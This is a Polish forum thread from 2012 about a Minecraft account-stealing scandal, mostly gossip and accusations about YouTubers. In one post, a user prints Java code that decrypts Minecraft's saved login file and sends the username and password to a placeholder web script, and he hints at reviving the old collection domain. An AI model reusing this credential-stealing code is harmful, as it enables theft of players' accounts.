Thread Closed 
Negatyw zamknął konto
Author Message
Aver Offline
*

Posts: 2
Joined: Dec 2012 {socialsites}


Post: #301
RE: Negatyw zamknął konto
(12-12-2012 22:18 )Golzeb Wrote:  Najbardziej ciekawi to co się dzieje teraz z tymi kontami. Czy usuniecie tego minecraft.jar ,kończy temat z stealer'em na komputerze?

Usunięcie minecraft.jar usuwa również keyloggera, ponieważ kod osadza się tylko w minecraftcie. Nie trzeba też skanować komputera, tak jak radzą co niektórzy, bo keylogger nie ingeruje w system operacyjny, ani w żadne aplikacje poza minecraftem!
Zresztą dane zapisywały się na stronie http://gg-luk.webuda.com/ , która już nie istnieje więc nie ma się czego bać, aż do momentu, gdy ktoś stworzy stronę o tym samym adresie ze skryptem zapisującym dane. (Właśnie podsunąłem komuś pomysł).

Do napisania tego keyloggera wcale nie trzeba być świetnym programistą, tym bardziej, że ten keylogger, czyli LastLogin Decryptor jest już od dawna w necie. Przykład takiego keyloggera:
http://pastebin.com/98K86Ygm

Ten skrypt, który jest w MineCash to jedynie tego przeróbka, aby login i hasło zapisywało się na stronie www, podejrzewam, że w pliku tekstowym - zapewne też znaleziony w necie. Przerobię to sam, żeby pokazać Wam jakie to łatwe, wystarczy podmienić kawałek kodu na to:
Code:
public static String DecryptMC() throws Exception {
    String output = null;
    Random random = new Random(43287234L);
    byte[] salt = new byte[8];
    random.nextBytes(salt);
    PBEParameterSpec pbeParamSpec = new PBEParameterSpec(salt, 5);
    SecretKey pbeKey = SecretKeyFactory.getInstance("PBEWithMD5AndDES")
        .generateSecret(new PBEKeySpec("passwordfile".toCharArray()));
    Cipher cipher = Cipher.getInstance("PBEWithMD5AndDES");
    cipher.init(2, pbeKey, pbeParamSpec);
    if (getWorkingDirectory().exists()) {
        File lastLogin = new File(getWorkingDirectory(), "lastlogin");
        DataInputStream dis = new DataInputStream(new CipherInputStream(
            new FileInputStream(lastLogin), cipher));
        output = "?user=" + dis.readUTF() + "&pass=" + dis.readUTF();
        jdMethod_try("http://adres-strony.pl/skrypcik.php" + output);
    }
}
i oto mamy gotowy keylogger. Jeszcze tylko skrypt na stronie, który nam to wszystko ładnie zapisze do pliku tekstowego. Po wywołaniu http://adres-strony.pl/skrypcik.php?user...pass=haslo , doda nam linijkę z danymi do logowania.
Tutaj oryginał do porównania: http://i.imgur.com/SVLLhh.png

Swoją drogą jeżeli TheNegatyw i MaciekTMPL mieli wgląd do kodu, to powinni znać adres strony, na której zapisują się dane. Wystarczyło tylko odgadnąć nazwę pliku .txt lub złamać ją jakimś słownikiem/bruteforcem (jeżeli jej nie znali) i mielibyśmy podgląd do tych danych.

(12-12-2012 22:16 )luke8828 Wrote:  ekhm... kolejny "hakier" z gimnazjum? Daruj sobie takie teksty.
Hę?
(This post was last modified: 12-12-2012 23:44 by Aver.)
12-12-2012 23:39
Find all posts by this user
NitroZyniak Offline

Posts: 33
Joined: Dec 2012 {socialsites}


Post: #302
RE: Negatyw zamknął konto
(12-12-2012 17:09 )bunny_kou Wrote:  http://www.youtube.com/watch?v=Udo9gKC9zFI&feature=plcp

Prze państwa- mój idol Nitro kontratakuje :D :D :D Ahhhh w obliczu takich dowodów, to już na pewno wszystko było robotą Pingwina ;) Skąd biorą się takie dzieci? On naprawdę myśli, że zrobił coś zajebistego? -.-''

HAHAHAHAHAHHAHA. Kozak film. Mamy do czynienia z nowym C.Eastwoodem :D
(This post was last modified: 13-12-2012 02:42 by NitroZyniak.)
13-12-2012 02:42
Find all posts by this user
MrChmielOO Offline

Posts: 173
Joined: May 2011 {socialsites}


Post: #303
RE: Negatyw zamknął konto
Sprawdziłem sobie w końcu kto to ten cały Pingwin i widzę, że Naczelny Psycholog Internetu już ruszył mu z odsieczą, swoją drogą, gdyby nie był w to zamieszany to po prostu miałby wysrane na całą sprawę
(This post was last modified: 13-12-2012 07:20 by MrChmielOO.)
13-12-2012 07:19
Find all posts by this user
BuldogPLay Offline
*

Posts: 9
Joined: Dec 2012 {socialsites}


Post: #304
RE: Negatyw zamknął konto
Mam takie pytanie: Czy jeśli ktoś ma dowody, że zostało dokonane przestępstwo, a mimo to nie ujawnia ich, to czy może zostać ukarany za zatajanie informacji o przestępstwie?
13-12-2012 14:38
Find all posts by this user
Cervolt Offline
*

Posts: 12
Joined: Dec 2012 {socialsites}


Post: #305
RE: Negatyw zamknął konto
(13-12-2012 14:38 )BuldogPLay Wrote:  Mam takie pytanie: Czy jeśli ktoś ma dowody, że zostało dokonane przestępstwo, a mimo to nie ujawnia ich, to czy może zostać ukarany za zatajanie informacji o przestępstwie?

Chyba tak. Utrudnianie sprawy :)
A co wiesz coś istotnego?
13-12-2012 14:43
Find all posts by this user
Baldo Offline
*

Posts: 71
Joined: Dec 2012 {socialsites}


Post: #306
RE: Negatyw zamknął konto
(13-12-2012 14:38 )BuldogPLay Wrote:  Mam takie pytanie: Czy jeśli ktoś ma dowody, że zostało dokonane przestępstwo, a mimo to nie ujawnia ich, to czy może zostać ukarany za zatajanie informacji o przestępstwie?
Tak, ale jeśli organy ścigania się do niego zgłoszą i on im tego nie ujawni, bo nikt nie ma obowiązku przedstawiania dowodów całemu światu...

http://www.baldopi.wordpress.com
http://www.twitter.com/BaldoPL
http://www.facebook.com/orteam
13-12-2012 14:51
Visit this user's website Find all posts by this user
MircoCroCop Offline
*

Posts: 101
Joined: Dec 2012 {socialsites}


Post: #307
RE: Negatyw zamknął konto
Doczytałem do ósmej, dziewiątej strony tematu , gdyż sądzę, że to tamten kontekst początkowy był najważniejszy. Moja opinia nie będzie również różnić się od moich poprzedników, mówię tutaj o narzekaniu na stanowisko maćka i negatywa. Co mogę od Siebie dodać? Że tak zwykle kończy się nadawanie zbyt wysokich przywilejów osobom, które występują pod maską internetu - nic się z hasłami nie stało, 'kradzieje' nie dadzą rady ich zmienić - właściciele zaś mogą - odłóżcie sprawę 'pozwania do sądu' na bok, bo takie rzeczy są nad wyraz śmieszne. Do sądu wędrują zwykle kryminaliści, którzy w jakiś sposób komuś zadali wewnętrzną lub zewnętrzną ranę, która nie zniknie przez lata - a nie na tym, że ktoś przez kilka dni skorzysta z naszego dobra. Starajcie się też postawić w sytuacji chłopaków. Macie okazję po cichu zgarnąć .. Na ileby to wyliczyć, 2.000 złotych - nie skorzystalibyście? Przeszlibyście obok tego obojętnie, w czasach, gdzie na zawód ogrodnika, czy taksówkarza potrzeba już wymagań jak na większego .. 'uczonego' tak to nazwijmy. Do bezpośrednich oskarżeń, postawicie się po dwóch stronach barykady..
13-12-2012 15:09
Find all posts by this user
BuldogPLay Offline
*

Posts: 9
Joined: Dec 2012 {socialsites}


Post: #308
RE: Negatyw zamknął konto
(13-12-2012 14:43 )Cervolt Wrote:  
(13-12-2012 14:38 )BuldogPLay Wrote:  Mam takie pytanie: Czy jeśli ktoś ma dowody, że zostało dokonane przestępstwo, a mimo to nie ujawnia ich, to czy może zostać ukarany za zatajanie informacji o przestępstwie?

Chyba tak. Utrudnianie sprawy :)
A co wiesz coś istotnego?

Chodziło mi o Buraczka. Cały czas twierdzi, że wie, kto jest w to zamieszany, a do tej pory ani jednego dowodu nie przedstawił. Coś mi tu śmierdzi...
13-12-2012 15:11
Find all posts by this user
jederow Offline
*

Posts: 11
Joined: Dec 2012 {socialsites}


Post: #309
RE: Negatyw zamknął konto
(13-12-2012 15:11 )BuldogPLay Wrote:  
(13-12-2012 14:43 )Cervolt Wrote:  
(13-12-2012 14:38 )BuldogPLay Wrote:  Mam takie pytanie: Czy jeśli ktoś ma dowody, że zostało dokonane przestępstwo, a mimo to nie ujawnia ich, to czy może zostać ukarany za zatajanie informacji o przestępstwie?

Chyba tak. Utrudnianie sprawy :)
A co wiesz coś istotnego?

Chodziło mi o Buraczka. Cały czas twierdzi, że wie, kto jest w to zamieszany, a do tej pory ani jednego dowodu nie przedstawił. Coś mi tu śmierdzi...

To sobie zobacz jaką aferę iDELTI zrobił, dostał dużo hejtu, że przez niego Pingwin odchodzi i wyłączył w nim komentarze -_- chodzi w tym filmie, że wymówił nicki (również tych co tego nie zrobili) youtuberów

Patrz w górę, patrz w dirta, umyj zęby, rozwalam bedrocka :D
(This post was last modified: 13-12-2012 15:26 by jederow.)
13-12-2012 15:21
Find all posts by this user
aagrest Offline
*

Posts: 9
Joined: Dec 2012 {socialsites}


Post: #310
RE: Negatyw zamknął konto
(13-12-2012 15:21 )jederow Wrote:  
(13-12-2012 15:11 )BuldogPLay Wrote:  
(13-12-2012 14:43 )Cervolt Wrote:  
(13-12-2012 14:38 )BuldogPLay Wrote:  Mam takie pytanie: Czy jeśli ktoś ma dowody, że zostało dokonane przestępstwo, a mimo to nie ujawnia ich, to czy może zostać ukarany za zatajanie informacji o przestępstwie?

Chyba tak. Utrudnianie sprawy :)
A co wiesz coś istotnego?

Chodziło mi o Buraczka. Cały czas twierdzi, że wie, kto jest w to zamieszany, a do tej pory ani jednego dowodu nie przedstawił. Coś mi tu śmierdzi...

To sobie zobacz jaką aferę iDELTI zrobił, dostał dużo hejtu, że przez niego Pingwin odchodzi i wyłączył w nim komentarze -_-


Podobno Buraczek go do tego namawiał (Deltiego do powiedzenia o Pingwinie). W ogóle Buraczek cały czas myśli, że jest jakimś guru youtube czy kij wie czym i jak ktoś mu się nie podoba to nasyła ludzi. Pamiętacie to z Pingwinem i jego filmem jak mówił coś tam o Buraczku? Od razu Burak się wkurzył. Może teraz się chce zemścić i namówił Deltiego do obwiniania Pingwina? Z resztą ja nie wiem.
13-12-2012 15:30
Find all posts by this user
Thread Closed 


Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  Konto MagdalenaMariaMonika zawieszone. buuu 13 6.106 29-03-2013 19:47
Last Post: AcerNew2
  Jak zmienić przypisane konto adsense? Adeo 8 3.612 08-11-2011 01:05
Last Post: Kern3l
  Konto Gnomka zHackowane - Przykra prawda czy po prostu zart? Mczulek 151 42.112 17-08-2011 17:12
Last Post: Starygnom
  VVitchaven zamknął konto thefifiasek 69 19.355 10-08-2011 11:45
Last Post: Lavos

Forum Jump:


User(s) browsing this thread: 169 Guest(s)
Strona główna | Return to Top | Return to Content | Lite (Archive) Mode | RSS Syndication | Forum GTAV.net.pl - Grand Theft Auto 5